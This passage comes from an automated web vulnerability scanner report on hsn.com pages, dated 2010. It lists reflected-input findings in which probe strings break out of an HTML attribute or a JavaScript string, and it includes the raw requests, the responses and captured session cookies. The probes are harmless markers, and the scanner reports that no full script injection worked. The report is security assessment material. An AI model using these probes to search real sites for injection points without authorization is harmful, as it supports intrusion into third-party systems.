Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=8x%2bo43LWlxGAfHNZU5QaQResozNe%2fWL4q%2bXO%2bmymL5k%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=DE1D860F4F1A1B42A193E9BCDFE35ACB; domain=.hsn.com; path=/
Set-Cookie: TLTHID=DE1D860F4F1A1B42A193E9BCDFE35ACB; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:53:29 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 111029


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://kitchen-dining.hsn.com/waggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx?b582f" a=b 0ed7d85e4ed=1&cm_mmc=sharingsite*email*PD*278651"
shareTitle="Waggoner Chocolates World of Chocolate at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-po
...[SNIP]...

1.21. http://sports.hsn.com/steiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sports.hsn.com
Path:   /steiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edda3"%20a%3db%209d97619d03c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as edda3" a=b 9d97619d03c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /steiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx?edda3"%20a%3db%209d97619d03c=1 HTTP/1.1
Host: sports.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:58:35 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2fO5D1o8L2Tv2UwJLhEwYhY&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fsports.hsn.com%3a80%2fsteiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx%3fedda3%22%2520a%253db%25209d97619d03c%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=dCJHGOPMFPQFqUfYDls8Hg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:35 GMT; path=/
Set-Cookie: sessionid=id=CQKhGphYGYXvKRpzjrzIkWT0JvgcAtlHgDcFF7czGGpw0p3fUecopg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=wPCxAmu%2fZU0PwyUd6nbl3KhYzp17khNr1Vq1tpyaXhILKUrRGjPy2A%3d%3d&abtid=6IKpljBBL4lyycFDGnOJbDz7dEcPsotTGrnHpiqCPAcIJz5VaTEuVw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:35 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:58:35 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=uk%2bpOOrRzDb0q4kNsouys5WcBhqZzuh6DhxUIA3K0RA%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=2FC163494D3B0446F201E8979EA89E48; domain=.hsn.com; path=/
Set-Cookie: TLTHID=2FC163494D3B0446F201E8979EA89E48; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:58:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 109471


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
tion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://sports.hsn.com/steiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx?edda3" a=b 9d97619d03c=1&cm_mmc=sharingsite*email*PD*1085635"
shareTitle="Steiner Sports Dwight Gooden Yankees &quot;No Hitter Celebration&quot; Autographed Photograph at HSN.com"
cmspTag="cm
...[SNIP]...

1.22. http://sports.hsn.com/steiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sports.hsn.com
Path:   /steiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93460"%20a%3db%20bd8fb62270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93460" a=b bd8fb62270 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /steiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx?93460"%20a%3db%20bd8fb62270=1 HTTP/1.1
Host: sports.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:58:33 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9yoMOwFe8nm2T5h6T1ljwy&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fsports.hsn.com%3a80%2fsteiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx%3f93460%22%2520a%253db%2520bd8fb62270%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=2DeknegkyihqxIkdPb6%2bow%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:33 GMT; path=/
Set-Cookie: sessionid=id=I4qzYy%2fMB8A4SefRNL8BnpiOJHZIwFxtiu476zu52sMcjdWhozrkdA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=6cWd6F6j00UyFjC6blX%2bWLIS%2bx4c9tI2UXplwb%2fGn4POsjz5%2bn5MIg%3d%3d&abtid=A4VxRyeoMVzZs2epsb%2fUqSHo22gpjs8BUncC8yVa2pnp8PTfhfY3uA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:33 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:58:34 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=hWxi2wO8R%2fd5NOm3hLdnLROBiQX1gIBTeAhXiBBDiLA%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=7C0F70974738B6CEED52CF940ED260B0; domain=.hsn.com; path=/
Set-Cookie: TLTHID=7C0F70974738B6CEED52CF940ED260B0; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:58:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 109953


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
mail_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://sports.hsn.com/steiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx?93460" a=b bd8fb62270=1&cm_mmc=sharingsite*email*PD*1085115"
shareTitle="Steiner Sports Ernie Banks MLB Signed Baseball with &quot;HOF 77&quot; Inscription. at HSN.com"
cmspTag="cm_sp=share*
...[SNIP]...

1.23. http://sports.hsn.com/steiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sports.hsn.com
Path:   /steiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d34"%20a%3db%20cae40db03a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9d34" a=b cae40db03a0 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /steiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx?a9d34"%20a%3db%20cae40db03a0=1 HTTP/1.1
Host: sports.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:58:24 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9yoMOwFe8nm%2bPOx%2bXavdGX&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fsports.hsn.com%3a80%2fsteiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx%3fa9d34%22%2520a%253db%2520cae40db03a0%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=2Deknegkyigi182slrdFxw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:24 GMT; path=/
Set-Cookie: sessionid=id=HfJ%2fKi2mmsl8KmIccFxk1TYtjrjjC%2fyR2g4o4kv5LghDHn2SijptoA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=Zxdul14WlmD%2bggweqrvXUuwmIxDaOUanfh0fUYsSyZwlar1%2b9IpTxw%3d%3d&abtid=lRXnAJtxuZcyZCFzhPBTwpxyrStkV9I9gf7jOLplOv9ngaUXTeIjSg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:24 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:58:25 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=r4FojdZSwf7J4yuvrabSvmoC6V2VrBS2bnDdzGowbO8%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=E370DF044A17C78A55190A9062304ABE; domain=.hsn.com; path=/
Set-Cookie: TLTHID=E370DF044A17C78A55190A9062304ABE; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:58:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 109397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://sports.hsn.com/steiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx?a9d34" a=b cae40db03a0=1&cm_mmc=sharingsite*email*PD*1085123"
shareTitle="Steiner Sports Jason Bay MLB Baseball with &quot;04' NL ROY&quot; Inscription at HSN.com"
cmspTag="cm_sp=share*email*
...[SNIP]...

1.24. http://www.hsn.com/brand-video-hub_at-4260_xa.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hsn.com
Path:   /brand-video-hub_at-4260_xa.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57003'%3b7eed68608f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57003';7eed68608f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand-video-hub_at-4260_xa.aspx?57003'%3b7eed68608f7=1 HTTP/1.1
Host: www.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerhsn_https_pool=520426924.47873.0000; TaazABUser=true; cmRS=&t1=1292009455654&t2=1292009456970&t3=1292009472812&t4=-1&lti=1292009472811&ln=&hr=/100k-givaway_at-5167_xa.aspx%3Fnolnav%3D1&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=/cnt/shared/tnavv7.aspx&ho=ww62.hsn.com/cm%3F&ci=90028889&ul=http%3A//www.hsn.com/cnt/shared/tnavV7.aspx&rf=http%3A//blogs.hsn.com/; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-transform
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 3:02:56 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=2DE6EFDE4955200105C810AF05F2A1D5; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 20:02:55 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 168819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
WebServices/GetShareComponent.aspx?R=' + Math.floor(Math.random() * 1000); //don not change this
url += "&url=" + encodeURI('http://www.hsn.com/brand-video_at-4260_xa.aspx?57003';7eed68608f7=1') + "&title=" + encodeURI('Brand Video Hub at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=Brand Video Hub";
new Ajax.Updater($('BreadCrumbsSharePlaceHolder'), url,
...[SNIP]...

1.25. http://www.hsn.com/brand-video-hub_at-4260_xa.aspx [nolnav parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hsn.com
Path:   /brand-video-hub_at-4260_xa.aspx

Issue detail

The value of the nolnav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c25da'%3b426cda0b393 was submitted in the nolnav parameter. This input was echoed as c25da';426cda0b393 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand-video-hub_at-4260_xa.aspx?nolnav=1c25da'%3b426cda0b393 HTTP/1.1
Host: www.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerhsn_https_pool=520426924.47873.0000; TaazABUser=true; cmRS=&t1=1292009455654&t2=1292009456970&t3=1292009472812&t4=-1&lti=1292009472811&ln=&hr=/100k-givaway_at-5167_xa.aspx%3Fnolnav%3D1&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=/cnt/shared/tnavv7.aspx&ho=ww62.hsn.com/cm%3F&ci=90028889&ul=http%3A//www.hsn.com/cnt/shared/tnavV7.aspx&rf=http%3A//blogs.hsn.com/; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-transform
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 3:02:53 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=03BA4BAD44105A7D8A00669067DA5C1B; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 20:02:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 168831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
ces/GetShareComponent.aspx?R=' + Math.floor(Math.random() * 1000); //don not change this
url += "&url=" + encodeURI('http://www.hsn.com/brand-video_at-4260_xa.aspx?nolnav=1c25da';426cda0b393') + "&title=" + encodeURI('Brand Video Hub at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=Brand Video Hub";
new Ajax.Updater($('BreadCrumbsSharePlaceHolder'), url,

...[SNIP]...

1.26. http://www.hsn.com/cs/default.aspx [cm_mmc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hsn.com
Path:   /cs/default.aspx

Issue detail

The value of the cm_mmc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2b5b'%3b85b7ac1babf was submitted in the cm_mmc parameter. This input was echoed as b2b5b';85b7ac1babf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cs/default.aspx?cm_sp=Global*TNL*Help&cm_mmc=sharingsite*Facebook*articles*HSN_Customer_Service_Pageb2b5b'%3b85b7ac1babf HTTP/1.1
Host: www.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerhsn_https_pool=520426924.47873.0000; TaazABUser=true; cmRS=&t1=1292009455654&t2=1292009456970&t3=1292009472812&t4=-1&lti=1292009472811&ln=&hr=/100k-givaway_at-5167_xa.aspx%3Fnolnav%3D1&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=/cnt/shared/tnavv7.aspx&ho=ww62.hsn.com/cm%3F&ci=90028889&ul=http%3A//www.hsn.com/cnt/shared/tnavV7.aspx&rf=http%3A//blogs.hsn.com/; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
